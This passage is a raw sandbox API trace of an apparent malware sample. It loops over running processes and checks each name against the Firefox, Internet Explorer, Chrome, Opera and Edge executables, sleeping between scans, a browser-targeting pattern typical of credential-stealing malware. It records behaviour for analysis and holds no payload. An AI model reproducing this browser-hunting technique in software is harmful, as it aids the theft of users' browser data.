(lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0233.884] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0233.884] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0233.884] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.884] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0233.885] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0233.885] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0233.885] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0233.885] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0233.885] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.885] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0233.885] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0233.885] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0233.885] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0233.885] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0233.885] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.885] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0233.886] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0233.886] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0233.886] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0233.886] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0233.886] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.886] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0233.886] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0233.886] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0233.886] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0233.886] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0233.887] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.887] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0233.887] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0233.887] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0233.887] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0233.887] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0233.887] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.887] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0233.888] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0233.888] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0233.888] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0233.888] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0233.888] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.888] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0233.888] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0233.888] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0233.888] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0233.888] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0233.888] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.888] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0233.889] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0233.889] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0233.889] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0233.889] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0233.889] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.889] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0233.889] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0233.889] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0233.889] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0233.889] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0233.890] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.890] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0233.890] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0233.890] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0233.890] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0233.890] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0233.890] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.890] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0233.891] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0233.891] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0233.891] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0233.891] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0233.891] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.891] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0233.891] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0233.891] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0233.891] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0233.891] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0233.891] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.891] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0233.892] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0233.892] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0233.892] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0233.892] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0233.892] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.892] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0233.892] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0233.892] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0233.892] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0233.892] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0233.893] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.893] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0233.893] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0233.893] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0233.893] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0233.893] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0233.893] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.893] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0233.894] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0233.894] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0233.894] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0233.894] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0233.894] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.894] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0233.894] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0233.894] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0233.894] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0233.894] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0233.894] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.894] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0233.895] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0233.895] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0233.895] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0233.895] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0233.895] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.895] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0233.895] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0233.895] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0233.895] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0233.895] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0233.895] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.896] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0233.896] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0233.896] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0233.896] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0233.896] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0233.896] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.896] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0233.897] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0233.897] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0233.897] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0233.897] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0233.897] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.897] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.897] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0233.897] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0233.897] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0233.897] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0233.897] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.897] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.898] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.898] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.898] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.898] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.898] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.898] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0233.898] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0233.898] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0233.898] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0233.898] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0233.898] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.899] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.899] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.899] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.899] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.899] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.899] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.899] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.900] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0233.900] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0233.900] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0233.900] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0233.900] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.900] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.901] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.901] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.901] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.901] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0233.901] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.901] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.901] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0233.901] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0233.901] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0233.901] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0233.901] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.901] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.902] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0233.902] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0233.902] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0233.902] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0233.902] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.902] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.903] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0233.903] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.903] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.904] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.904] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.905] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0233.905] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.905] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0233.905] CloseHandle (hObject=0xe8) returned 1 [0233.905] Sleep (dwMilliseconds=0x3e8) [0234.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0234.915] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.916] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0234.916] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0234.916] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0234.916] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0234.916] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0234.916] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.916] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0234.916] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0234.916] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0234.916] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0234.917] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0234.917] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, 